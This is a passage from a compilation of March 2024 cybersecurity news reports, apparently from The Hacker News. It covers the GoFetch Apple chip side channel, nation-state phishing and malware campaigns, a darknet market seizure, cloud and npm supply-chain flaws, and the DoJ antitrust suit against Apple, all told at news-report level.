GoFetch, in a nutshell, demonstrates that "even if a victim correctly separates data from addresses by following the constant-time paradigm, the DMP will generate secret-dependent memory access on the victim's behalf," rendering it susceptible to key-extraction attacks.
In other words, an attacker could weaponize the prefetcher to influence the data being prefetched, thus opening the door to accessing sensitive data. The vulnerability has serious implications in that it completely nullifies the security protections offered by constant-time programming against timing side-channel attacks.
"GoFetch shows that the DMP is significantly more aggressive than previously thought and thus poses a much greater security risk," the researchers noted.
The fundamental nature of the flaw means that it cannot be fixed in existing Apple CPUs, requiring that developers of cryptographic libraries take steps to prevent conditions that allow GoFetch to succeed, something that could also introduce a performance hit. Users, on the other hand, are urged to keep their systems up-to-date.
On Apple M3 chips, however, enabling data-independent timing (DIT) has been found to disable DMP. This is not possible on M1 and M2 processors.
"Apple silicon provides data-independent timing (DIT), in which the processor completes certain instructions in a constant amount of time," Apple notes in its documentation. "With DIT enabled, the processor uses the longer, worst-case amount of time to complete the instruction, regardless of the input data."
The iPhone maker also emphasized that although turning on DIT prevents timing-based leakage, developers are recommended to adhere to "avoid conditional branches and memory access locations based on the value of the secret data" in order to effectively block an adversary from inferring secret by keeping tabs on the processor's microarchitectural state.
The development comes as another group of researchers from the Graz University of Technology in Austria and the University of Rennes in France demonstrated a new graphics processing unit (GPU) attack affecting popular browsers and graphics cards that leverages specially crafted JavaScript code in a website to infer sensitive information such as passwords.
The technique, which requires no user interaction, has been described as the first GPU cache side-channel attack from within the browser.
"Since GPU computing can also offer advantages for computations within websites, browser vendors decided to expose the GPU to JavaScript through APIs like WebGL and the upcoming WebGPU standard," the researchers said.
"Despite the inherent restrictions of the JavaScript and WebGPU environment, we construct new attack primitives enabling cache side-channel attacks with an effectiveness comparable to traditional CPU-based attacks."
A threat actor could weaponize it by means of a drive-by attack, allowing for the extraction of AES keys or mining cryptocurrencies as users browse the internet. It impacts all operating systems and browsers implementing the WebGPU standard, as well as a broad range of GPU devices.
As countermeasures, the researchers propose treating access to the host system's graphics card via the browser as a sensitive resource, requiring websites to seek users permission (like in the case of camera or microphone) before use.
Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks
26.3.24
APT
The Hacker News
The Iran-affiliated threat actor
tracked as MuddyWater (aka Mango Sandstorm or TA450) has been linked to a new
phishing campaign in March 2024 that aims to deliver a legitimate Remote
Monitoring and Management (RMM) solution called Atera.
The activity, which took place from March 7 through the week of March 11, targeted Israeli entities spanning global manufacturing, technology, and information security sectors, Proofpoint said.
"TA450 sent emails with PDF attachments that contained malicious links," the enterprise security firm said. "While this method is not foreign to TA450, the threat actor has more recently relied on including malicious links directly in email message bodies instead of adding in this extra step."
MuddyWater has been attributed to attacks directed against Israeli organizations since late October 2023, with prior findings from Deep Instinct uncovering the threat actor's use of another remote administration tool from N-able.
This is not the first time the adversary – assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS) – has come under the spotlight for its reliance on legitimate remote desktop software to meet its strategic goals. Similar phishing campaigns have led to the deployment of ScreenConnect, RemoteUtilities, Syncro, and SimpleHelp in the past.
The latest attack chains involve MuddyWater embedding links to files hosted on file-sharing sites such as Egnyte, Onehub, Sync, and TeraBox. Some of the pay-themed phishing messages are said to have been sent from a likely compromised email account associated with the "co.il" (Israel) domain.
In the next stage, clicking on the link present within the PDF lure document leads to the retrieval of a ZIP archive containing an MSI installer file that ultimately installs the Atera Agent on the compromised system. MuddyWater's use of Atera Agent dates back to July 2022.
The shift in MuddyWater's tactics comes as an Iranian hacktivist group dubbed Lord Nemesis has targeted the Israeli academic sector by breaching a software services provider named Rashim Software in what's case of a software supply chain attack.
"Lord Nemesis allegedly used the credentials obtained from the Rashim breach to infiltrate several of the company's clients, including numerous academic institutes," Op Innovate said. "The group claims to have obtained sensitive information during the breach, which they may use for further attacks or to exert pressure on the affected organizations."
Lord Nemesis is believed to have used the unauthorized access it gained to Rashim's infrastructure by hijacking the admin account and leveraging the company's inadequate multi-factor authentication (MFA) protections to harvest personal data of interest.
It also sent email messages to over 200 of its customers on March 4, 2024, four months after the initial breach took place, detailing the extent of the incident. The exact method by which the threat actor gained access to Rashim's systems was not disclosed.
"The incident highlights the significant risks posed by third-party vendors and partners (supply chain attack)," security researcher Roy Golombick said. "This attack highlights the growing threat of nation-state actors targeting smaller, resource-limited companies as a means to further their geo-political agendas."
"By successfully compromising Rashim's admin account, the Lord Nemesis group effectively circumvented the security measures put in place by numerous organizations, granting themselves elevated privileges and unrestricted access to sensitive systems and data."
N. Korea-linked Kimsuky Shifts to Compiled HTML Help Files in Ongoing
Cyberattacks
24.3.24
APT
The Hacker News
The North Korea-linked threat actor known as Kimsuky (aka Black Banshee, Emerald Sleet, or Springtail) has been observed shifting its tactics, leveraging Compiled HTML Help (CHM) files as vectors to deliver malware for harvesting sensitive data.
Kimsuky, active since at least 2012, is known to target entities located in South Korea as well as North America, Asia, and Europe.
According to Rapid7, attack chains have leveraged weaponized Microsoft Office documents, ISO files, and Windows shortcut (LNK) files, with the group also employing CHM files to deploy malware on compromised hosts.
The cybersecurity firm has attributed the activity to Kimsuky with moderate confidence, citing similar tradecraft observed in the past.
"While originally designed for help documentation, CHM files have also been exploited for malicious purposes, such as distributing malware, because they can execute JavaScript when opened," the company said.
The CHM file is propagated within an ISO, VHD, ZIP, or RAR file, opening which executes a Visual Basic Script (VBScript) to set up persistence and reach out to a remote server to fetch a next-stage payload responsible for gathering and exfiltrating sensitive data.
Rapid7 described the attacks as ongoing and evolving, targeting organizations based in South Korea. It also identified an alternate infection sequence that employs a CHM file as a starting point to drop batch files tasked with harvesting the information and a PowerShell script to connect to the C2 server and transfer the data.
"The modus operandi and reusing of code and tools are showing that the threat actor is actively using and refining/reshaping its techniques and tactics to gather intelligence from victims," it said.
The development comes as Broadcom-owned Symantec revealed that the Kimsuky actors are distributing malware impersonating an application from a legitimate Korean public entity.
"Once compromised, the dropper installs an Endoor backdoor malware," Symantec said. "This threat enables attackers to collect sensitive information from the victim or install additional malware."
It's worth noting that the Golang-based Endoor, alongside Troll Stealer (aka TrollAgent), has been recently deployed in connection with cyber attacks that target users downloading security programs from a Korean construction-related association's website.
The findings also arrive amid a probe initiated by the United Nations into 58 suspected cyber attacks carried out by North Korean nation-state actors between 2017 and 2023 that netted $3 billion in illegal revenues to help it further develop its nuclear weapons program.
"The high volume of cyber attacks by hacking groups subordinate to the Reconnaissance General Bureau reportedly continued," the report said. "Trends include targeting defense companies and supply chains and, increasingly, sharing infrastructure and tools."
The Reconnaissance General Bureau (RGB) is North Korea's primary foreign intelligence service, comprising the threat clusters widely tracked as the Lazarus Group – and its subordinate elements, Andariel and BlueNoroff – and Kimsuky.
"Kimsuky has shown interest in using generative artificial intelligence, including large language models, potentially for coding or writing phishing emails," the report further added. "Kimsuky has been observed using ChatGPT."
German Police Seize 'Nemesis Market' in Major International Darknet Raid
24.3.24
BigBrothers
The Hacker News
German authorities have announced
the takedown of an illicit underground marketplace called Nemesis Market that
peddled narcotics, stolen data, and various cybercrime services.
The Federal Criminal Police Office (aka Bundeskriminalamt or BKA) said it seized the digital infrastructure associated with the darknet service located in Germany and Lithuania and confiscated €94,000 ($102,107) in cryptocurrency assets.
The operation, conducted in collaboration with law enforcement agencies from Germany, Lithuania, and the U.S., took place on March 20, 2024, following an extensive investigation that commenced in October 2022.
Founded in 2021, Nemesis Market is estimated to have had more than 150,000 user accounts and 1,100 seller accounts from all over the world prior to its shutdown. Almost 20$ of the seller accounts were from Germany.
"The range of goods available on the marketplace included narcotics, fraudulently obtained data and goods, as well as a selection of cybercrime services such as ransomware, phishing, or DDoS attacks," the BKA said.
The agency said further investigations against criminal sellers and users of the platform are presently ongoing. That said, no arrests have been made.
The development comes a month after another coordinated law enforcement operation took down the LockBit ransomware group, taking control of the outfit's servers and arresting three affiliates from Poland and Ukraine. The disruption prompted the gang to relaunch its cyber extortion operation.
In recent months, German authorities have also taken down Kingdom Market and Crimemarket, both of which boasted of thousands of users and offered a wide array of money laundering and cybercrime services.
Russian Hackers Use 'WINELOADER' Malware to Target German Political Parties
23.3.24
Virus
The Hacker News
The WINELOADER backdoor used in
recent cyber attacks targeting diplomatic entities with wine-tasting phishing
lures has been attributed as the handiwork of a hacking group with links to
Russia's Foreign Intelligence Service (SVR), which was responsible for breaching
SolarWinds and Microsoft.
The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or Cozy Bear) used the malware to target German political parties with phishing emails bearing a logo from the Christian Democratic Union (CDU) around February 26, 2024.
"This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions," researchers Luke Jenkins and Dan Black said.
WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of a cyber espionage campaign that's believed to have been ongoing since at least July 2023. It attributed the activity to a cluster dubbed SPIKEDWINE.
Attack chains leverage phishing emails with German-language lure content that purports to be an invite for a dinner reception to trick recipients into clicking on a phony link and downloading a rogue HTML Application (HTA) file, a first-stage dropper called ROOTSAW (aka EnvyScout) that acts as a conduit to deliver WINELOADER from a remote server.
"The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website," the researchers said. "ROOTSAW delivered a second-stage CDU-themed lure document and a next stage WINELOADER payload."
WINELOADER, invoked via a technique called DLL side-loading using the legitimate sqldumper.exe, comes equipped with abilities to contact an actor-controlled server and fetch additional modules for execution on the compromised hosts.
It's said to share similarities with known APT29 malware families like BURNTBATTER, MUSKYBEAT, and BEATDROP, suggesting the work of a common developer.
WINELOADER, per the Google Cloud subsidiary, has also been employed in an operation targeting diplomatic entities in the Czech Republic, Germany, India, Italy, Latvia, and Peru in late January 2024.
"ROOTSAW continues to be the central component of APT29's initial access efforts to collect foreign political intelligence," the company said.
"The first-stage malware's expanded use to target German political parties is a noted departure from the typical diplomatic focus of this APT29 subcluster, and almost certainly reflects the SVR's interest in gleaning information from political parties and other aspects of civil society that could advance Moscow's geopolitical interests."
The development comes as German prosecutors have charged a military officer, named Thomas H, with espionage offenses after he was allegedly caught spying on behalf of Russian intelligence services and passing on unspecified sensitive information. He was arrested in August 2023.
"From May 2023, he approached the Russian Consulate General in Bonn and the Russian Embassy in Berlin several times on his own initiative and offered to cooperate," the Office of the Federal Prosecutor said. "On one occasion, he transmitted information that he had obtained in the course of his professional activities for forwarding to a Russian intelligence service."
New StrelaStealer Phishing Attacks Hit Over 100 Organizations in E.U. and U.S.
22.3.24
Virus
The Hacker News
Cybersecurity researchers have
detected a new wave of phishing attacks that aim to deliver an ever-evolving
information stealer referred to as StrelaStealer.
The campaigns impact more than 100 organizations in the E.U. and the U.S., Palo Alto Networks Unit 42 researchers said in a new report published today.
"These campaigns come in the form of spam emails with attachments that eventually launch the StrelaStealer's DLL payload," the company said in a report published today.
"In an attempt to evade detection, attackers change the initial email attachment file format from one campaign to the next, to prevent detection from the previously generated signature or patterns."
First disclosed in November 2022, StrelaStealer is equipped to siphon email login data from well-known email clients and exfiltrate them to an attacker-controlled server.
Since then, two large-scale campaigns involving the malware have been detected in November 2023 and January 2024 targeting high tech, finance, professional and legal, manufacturing, government, energy, insurance, and construction sectors in the E.U. and the U.S.
These attacks also aim to deliver a new variant of the stealer that packs in better obfuscation and anti-analysis techniques, while being propagated via invoice-themed emails bearing ZIP attachments, marking a shift from ISO files.
Present within the ZIP archives is a JavaScript file that drops a batch file, which, in turn, launches the stealer DLL payload using rundll32.exe, a legitimate Windows component responsible for running 32-bit dynamic-link libraries.
The stealer malware also relies on a bag of obfuscation tricks to render analysis difficult in sandboxed environments.
"With each new wave of email campaigns, threat actors update both the email attachment, which initiates the infection chain, and the DLL payload itself," the researchers said.
The disclosure comes as Broadcom-owned Symantec revealed that fake installers for well known applications or cracked software hosted on GitHub, Mega or Dropbox are serving as a conduit for a stealer malware known as Stealc.
Phishing campaigns have also been observed delivering Revenge RAT and Remcos RAT (aka Rescoms), with the latter delivered by means of a cryptors-as-a-service (CaaS) called AceCryptor, per ESET.
"During the second half of [2023], Rescoms became the most prevalent malware
family packed by AceCryptor," the cybersecurity firm said, citing telemetry
data. "Over half of these attempts happened in Poland, followed by Serbia,
Spain, Bulgaria, and Slovakia."
Other prominent off-the-shelf malware packed inside AceCryptor in H2 2023 include SmokeLoader, STOP ransomware, RanumBot, Vidar, RedLine, Tofsee, Fareit, Pitou, and Stealc. It's worth noting that many of these malware strains have also been disseminated via PrivateLoader.
Another social engineering scam observed by Secureworks Counter Threat Unit (CTU) has been found to target individuals seeking information about recently deceased individuals on search engines with fake obituary notices hosted on bogus websites, driving traffic to the sites through search engine optimization (SEO) poisoning in order to ultimately push adware and other unwanted programs.
"Visitors to these sites are redirected to e-dating or adult entertainment websites or are immediately presented with CAPTCHA prompts that install web push notifications or popup ads when clicked," the company said.
"The notifications display false virus alert warnings from well-known antivirus applications like McAfee and Windows Defender, and they persist in the browser even if the victim clicks one of the buttons."
"The buttons link to legitimate landing pages for subscription-based antivirus software programs, and an affiliate ID embedded in the hyperlink rewards threat actors for new subscriptions or renewals."
While the activity is currently limited to filling fraudsters' coffers via affiliate programs, the attack chains could be easily repurposed to deliver information stealers and other malicious programs.
The development also follows the discovery a new activity cluster tracked as Fluffy Wolf that's capitalizing on phishing emails containing an executable attachment to deliver a cocktail of threats, such as MetaStealer, Warzone RAT, XMRig miner, and a legitimate remote desktop tool called Remote Utilities.
The campaign is a sign that even unskilled threat actors can leverage malware-as-a-service (MaaS) schemes to conduct successful attacks at scale and plunder sensitive information, which can then be monetized further for profit.
"Although mediocre in terms of technical skills, these threat actors achieve their goals by using just two sets of tools: legitimate remote access services and inexpensive malware," BI.ZONE said.
AWS Patches Critical 'FlowFixation' Bug in Airflow Service to Prevent Session
Hijacking
22.3.24
Vulnerebility
The Hacker News
Cybersecurity researchers have
shared details of a now-patched security vulnerability in Amazon Web Services
(AWS) Managed Workflows for Apache Airflow (MWAA) that could be potentially
exploited by a malicious actor to hijack victims' sessions and achieve remote
code execution on underlying instances.
The vulnerability, now addressed by AWS, has been codenamed FlowFixation by Tenable.
"Upon taking over the victim's account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGS)," senior security researcher Liv Matan said in a technical analysis.
"Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services."
The root cause of the vulnerability, per the cybersecurity firm, is a combination of session fixation on the web management panel of AWS MWAA and an AWS domain misconfiguration that results in a cross-site scripting (XSS) attack.
Session fixation is a web attack technique that occurs when a user is authenticated to a service without invalidating any existing session identifiers. This permits the adversary to force (aka fixate) a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session.
By abusing the shortcoming, a threat actor could have forced victims to use and authenticate the attacker's known session and ultimately take over the victim's web management panel.
"FlowFixation highlights a broader issue with the current state of cloud providers' domain architecture and management as it relates to the Public Suffix List (PSL) and shared-parent domains: same-site attacks," Matan said, adding the misconfiguration also impacts Microsoft Azure and Google Cloud.
Tenable also pointed out that the shared architecture – where several customers have the same parent domain – could be a goldmine for attackers looking to exploit vulnerabilities like same-site attacks, cross-origin issues, and cookie tossing, effectively leading to unauthorized access, data leaks, and code execution.
The shortcoming has been addressed by both AWS and Azure adding the misconfigured domains to PSL, thus causing web browsers to recognize the added domains as a public suffix. Google Cloud, on the other hand, has described the issue as not "severe enough" to merit a fix.
"In the case of same-site attacks, the security impact of the mentioned domain architecture is significant, with heightened risk of such attacks in cloud environments," Matan explained.
"Among these, cookie-tossing attacks and same-site attribute cookie protection bypass are particularly concerning as both can circumvent CSRF protection. Cookie-tossing attacks can also abuse session-fixation issues."
China-Linked Group Breaches Networks via Connectwise, F5 Software Flaws
22.3.24
APT
The Hacker News
A China-linked threat cluster
leveraged security flaws in Connectwise ScreenConnect and F5 BIG-IP software to
deliver custom malware capable of delivering additional backdoors on compromised
Linux hosts as part of an "aggressive" campaign.
Google-owned Mandiant is tracking the activity under its uncategorized moniker UNC5174 (aka Uteus or Uetus), describing it as a "former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations."
The threat actor is believed to have orchestrated widespread attacks against Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and U.K. government organizations between October and November 2023, and again in February 2024 using the ScreenConnect bug.
Initial access to target environments is facilitated by the exploitation of known security flaws in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), Linux Kernel (CVE-2022-0185), and Zyxel (CVE-2022-3052).
A successful foothold is followed by extensive reconnaissance and scanning of internet-facing systems for security vulnerabilities, with UNC5174 also creating administrative user accounts to execute malicious actions with elevated privileges, including dropping a C-based ELF downloader dubbed SNOWLIGHT.
SNOWLIGHT is designed to download the next-stage payload, an obfuscated Golang backdoor named GOREVERSE, from a remote URL that's related to SUPERSHELL, an open-source command-and-control (C2) framework that allows attackers to establish a reverse SSH tunnel and launch interactive shell sessions to execute arbitrary code.
Also put to use by the threat actor is a Golang-based tunneling tool known as GOHEAVY, which is likely employed to facilitate lateral movement within compromised networks, as well as other programs like afrog, DirBuster, Metasploit, Sliver, and sqlmap.
In one unusual instance spotted by the threat intelligence firm, the threat
actors have been found to apply mitigations for CVE-2023-46747 in a likely
attempt to prevent other unrelated adversaries from weaponizing the same
loophole to obtain access.
"UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives 'Dawn Calvary' and has collaborated with 'Genesis Day' / 'Xiaoqiying' and 'Teng Snake,'" Mandiant assessed. "This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments."
There is evidence to suggest that the threat actor may be an initial access broker and has the backing of the MSS, given their alleged claims in dark web forums. This is bolstered by the fact some of the U.S. defense and U.K. government entities were simultaneously targeted by another access broker referred to as UNC302.
The findings once again underscore Chinese nation-state groups' continued efforts to breach edge appliances by swiftly co-opting recently disclosed vulnerabilities into their arsenal in order to conduct cyber espionage operations at scale.
"UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation," Mandiant researchers said.
"There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution."
The disclosure comes as the MSS warned that an unnamed foreign hacking group had infiltrated "hundreds" of Chinese business and government organizations by leveraging phishing emails and known security bugs to breach networks. It did not reveal the threat actor's name or origin.
Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects
22.3.24
Spam
The Hacker News
A massive malware campaign dubbed
Sign1 has compromised over 39,000 WordPress sites in the last six months, using
malicious JavaScript injections to redirect users to scam sites.
The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.
The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code.
The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.
What's more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.
"One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.," security researcher Ben Martin said. "If the referrer does not match to these major sites, then the malware will not execute."
Site visitors are then taken to other scam sites by executing another JavaScript from the same server.
The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.
It's suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.
"Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites," Martin said. "Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin."
This approach of not placing any malicious code into server files allows the malware to stay undetected for extended periods of time, Sucuri said.
U.S. Justice Department Sues Apple Over Monopoly and Messaging Security
22.3.24
BigBrothers
The Hacker News
The U.S. Department of Justice
(DoJ), along with 16 other state and district attorneys general, on Thursday
accused Apple of illegally maintaining a monopoly over smartphones, thereby
undermining, among other things, the security and privacy of users when
messaging non-iPhone users.
"Apple wraps itself in a cloak of privacy, security, and consumer preferences to justify its anticompetitive conduct," the landmark antitrust lawsuit said. "Apple deploys privacy and security justifications as an elastic shield that can stretch or contract to serve Apple's financial and business interests."
"Apple selectively compromises privacy and security interests when doing so is in Apple's own financial interest – such as degrading the security of text messages, offering governments and certain companies the chance to access more private and secure versions of app stores, or accepting billions of dollars each year for choosing Google as its default search engine when more private options are available."
The sprawling complaint also alleged that iPhone users who message a non-iPhone user via the Messages app are defaulted to the less secure SMS format (as opposed to iMessage) that lacks support for encryption and offers limited functionality. On the other hand, iMessage is end-to-end encrypted (E2EE) and is even quantum-resistant.
It's worth noting at this stage that iMessage is only available on the iPhone and other Apple devices. Apple has repeatedly said it has no plans of making iMessage interoperable with Android, even stating that doing so "will hurt us more than help us."
Furthermore, the 88-page lawsuit called out the iPhone maker for blocking attempts by third-parties to bring secure cross-platform messaging experience between iOS and Android platform.
In December 2023, Beeper managed to reverse engineer the iMessage protocol and port the service to Android through a dedicated client called Beeper Mini. Apple, however, has shut down those efforts, arguing that Beeper "posed significant risks to user security and privacy, including the potential for metadata exposure and enabling unwanted messages, spam, and phishing attacks."
These limitations have a powerful network effect, driving consumers to continue buying iPhones and less likely to switch to a competing device, the DoJ said, adding, "by rejecting solutions that would allow for cross-platform encryption, Apple continues to make iPhone users' less secure than they could otherwise be."
The development comes as Apple is facing more scrutiny than ever to open up its tightly-controlled software ecosystem -- the so-called "walled garden" -- which regulators say locks in customers and developers. Other major tech giants like Microsoft, Google, Amazon, and Meta have all dealt with similar lawsuits in recent years.
Apple, in a surprise move late last year, announced that it intends to add support for Rich Communication Services (RCS) – an upgraded version of the SMS standard with modern instant messaging features – to its Messages app. It also said it will work with the GSMA members to integrate encryption.
In response to the lawsuit, Cupertino said it will "vigorously defend" itself and that the lawsuit "threatens who we are and the principles that set Apple products apart in fiercely competitive markets." It also said that DoJ winning the lawsuit would "set a dangerous precedent, empowering the government to take a heavy hand in designing people's technology."
Russian Hackers May Have Targeted Ukrainian Telecoms with Upgraded 'AcidPour'
Malware
22.3.24
Virus
The Hacker News
The data wiping malware called
AcidPour may have been deployed in attacks targeting four telecom providers in
Ukraine, new findings from SentinelOne show.
The cybersecurity firm also confirmed connections between the malware and AcidRain, tying it to threat activity clusters associated with Russian military intelligence.
"AcidPour's expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions," security researchers Juan Andres Guerrero-Saade and Tom Hegel said.
AcidPour is a variant of AcidRain, a wiper that was used to render Viasat KA-SAT modems operable at the onset of the Russo-Ukrainian war in early 2022 and cripple Ukraine's military communications.
It also builds upon the latter's features, while targeting Linux systems running on x86 architecture. AcidRain, on the other hand, is compiled for MIPS architecture.
Where AcidRain was more generic, AcidPour incorporates logic to target embedded devices, Storage Area Networks (SANs), Network Attached Storage (NAS) appliances, and dedicated RAID arrays.
That said, both the strains overlap when it comes to the use of the reboot calls and the method employed for recursive directory wiping. Also identical is the IOCTLs-based device-wiping mechanism that also shares commonalities with another malware linked to Sandworm known as VPNFilter.
"One of the most interesting aspects of AcidPour is its coding style, reminiscent of the pragmatic CaddyWiper broadly utilized against Ukrainian targets alongside notable malware like Industroyer 2," the researchers said.
The C-based malware comes with a self-delete function that overwrites itself on disk at the beginning of its execution, while also employing an alternate wiping approach depending on the device type.
AcidPour has been attributed to a hacking crew tracked as UAC-0165, which is
associated with Sandworm and has a track record of striking Ukrainian critical
infrastructure.
The Computer Emergency Response Team of Ukraine (CERT-UA), in October 2023, implicated the adversary to attacks targeting at least 11 telecommunication service providers in the country between May and September of last year.
"[AcidPour] could have been used in 2023," Hegel told The Hacker News. "It's likely the actor has made use of AcidRain/AcidPour related tooling consistently throughout the war. A gap in this perspective speaks to the level of insight the public often has to cyber intrusions – generally quite limited and incomplete."
The ties to Sandworm are further bolstered by the fact that a threat actor known as Solntsepyok (aka Solntsepek or SolntsepekZ) claimed to have infiltrated four different telecommunication operators in Ukraine and disrupted their services on March 13, 2024, three days prior to the discovery of AcidPour.
Solntsepyok, according to the State Special Communications Service of Ukraine (SSSCIP), is a Russian advanced persistent threat (APT) with likely ties to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), which also operates Sandworm.
It's worth pointing out that Solntsepyok has also been accused of hacking into Kyivstar's systems as early as May 2023. The breach came to light in late December.
While it's currently not clear if AcidPour was used in the latest set of attacks, the discovery suggests that threat actors are constantly refining their tactics to stage destructive assaults and inflict significant operational impact.
"This progression reveals not only a refinement in the technical capabilities of these threat actors but also their calculated approach to select targets that maximize follow-on effects, disrupting critical infrastructure and communications," the researchers said.
Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems
22.3.24
APT
The Hacker News
The Russia-linked threat actor
known as Turla infected several systems belonging to an unnamed European
non-governmental organization (NGO) in order to deploy a backdoor called
TinyTurla-NG (TTNG).
"The attackers compromised the first system, established persistence and added exclusions to antivirus products running on these endpoints as part of their preliminary post-compromise actions," Cisco Talos said in a new report published today.
"Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network."
There is evidence indicating that the infected systems were breached as early as October 2023, with Chisel deployed in December 2023 and data exfiltration taking place via the tool a month later, around January 12, 2024.
TinyTurla-NG was first documented by the cybersecurity company last month after it was found to be used in connection with a cyber attack targeting a Polish NGO working on improving Polish democracy and supporting Ukraine during the Russian invasion.
Cisco Talos told The Hacker News at the time that the campaign appears to be highly targeted and focused on a small number of organizations, most of which are located in Poland.
The attack chain involves Turla exploiting their initial access to configure
Microsoft Defender antivirus exclusions to evade detection and drop
TinyTurla-NG, which is then persisted by creating a malicious "sdm" service that
masquerades as a "System Device Manager" service.
TinyTurla-NG acts as a backdoor to conduct follow-on reconnaissance, exfiltrate files of interest to a command-and-control (C2) server, and deploy a custom-built version of the Chisel tunneling software. The exact intrusion pathway is still being investigated.
"Once the attackers have gained access to a new box, they will repeat their activities to create Microsoft Defender exclusions, drop the malware components, and create persistence," Talos researchers said.
Over 800 npm Packages Found with Discrepancies, 18 Exploitable to 'Manifest
Confusion'
21.3.24
Virus
The Hacker News
New research has discovered over 800 packages in the npm registry which have discrepancies from their registry entries, out of which 18 have been found to exploit a technique called manifest confusion.
The findings come from cybersecurity firm JFrog, which said the issue could be exploited by threat actors to trick developers into running malicious code.
"It's an actual threat since developers may be tricked into downloading packages that look innocent, but whose hidden dependencies are actually malicious," security researcher Andrey Polkovnichenko told The Hacker News.
Manifest confusion was first documented in July 2023, when security researcher Darcy Clarke found that mismatches in manifest and package metadata could be weaponized to stage software supply chain attacks.
The problem stems from the fact that the npm registry does not validate whether the manifest file contained in the tarball (package.json) matches the manifest data provided to the npm server during the publishing process via an HTTP PUT request to the package URI endpoint.
As a result, a threat actor could take advantage of this lack of cross verification to supply a different manifest containing hidden dependencies that's processed during package installation to stealthily install malicious dependencies onto the developer's system.
"The visible, or 'fake,' manifest can mislead developers and even audit tools that rely on the data available in the npm registry database," JFrog said. "In reality, the installer takes the file package.json from the tarball, which may be different from the visible one supplied in the HTTP PUT request."
The company said it identified more than 800 packages where there was a mismatch
between the manifest in the npm registry and the package.json file inside the
tarball.
While many of these mismatches are the result of protocol specification differences or variations in the scripts section of the package file, 18 of them are said to have been designed to exploit manifest confusion.
A notable package in question is yatai-web-ui, which is designed to send an HTTP request to a server with information about the IP address of the machine in which the package was installed.
The findings show that the attack vector seems to have never been put to use by threat actors. That said, it's crucial that developers take steps to ensure the packages are free of suspicious behaviors.
"Since this issue was not resolved by npm, trusting packages only by how they look on npm's website, might be risky," Polkovnichenko said.
"Organizations should introduce procedures that verify that all packages that enter the organization or are used by their dev teams are safe and can be trusted. Specifically in the case of manifest confusion, it's required that every package is analyzed to see if there are any hidden dependencies."
AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials
21.3.24
Virus
The Hacker News
Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data.
"It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan said.
"Classified as an SMTP cracker, it exploits SMTP using various strategies such as credential exploitation, web shell deployment, and vulnerability scanning."
AndroxGh0st has been detected in the wild since at least 2022, with threat actors leveraging it to access Laravel environment files and steal credentials for various cloud-based applications like Amazon Web Services (AWS), SendGrid, and Twilio.
Attack chains involving the Python malware are known to exploit known security flaws in Apache HTTP Server, Laravel Framework, and PHPUnit to gain initial access and for privilege escalation and persistence.
Earlier this January, U.S. cybersecurity and intelligence agencies warned of attackers deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."
"Androxgh0st first gains entry through a weakness in Apache, identified as CVE-2021-41773, allowing it to access vulnerable systems," Pattan explained.
"Following this, it exploits additional vulnerabilities, specifically CVE-2017-9841 and CVE-2018-15133, to execute code and establish persistent control, essentially taking over the targeted systems."
Androxgh0st is designed to exfiltrate sensitive data from various sources, including .env files, databases, and cloud credentials. This allows threat actors to deliver additional payloads to compromised systems.
Juniper Threat Labs said it has observed an uptick in activity related to the exploitation of CVE-2017-9841, making it essential that users move quickly to update their instances to the latest version.
A majority of the attack attempts targeting its honeypot infrastructure
originated from the U.S., U.K., China, the Netherlands, Germany, Bulgaria,
Kuwait, Russia, Estonia, and India, it added.
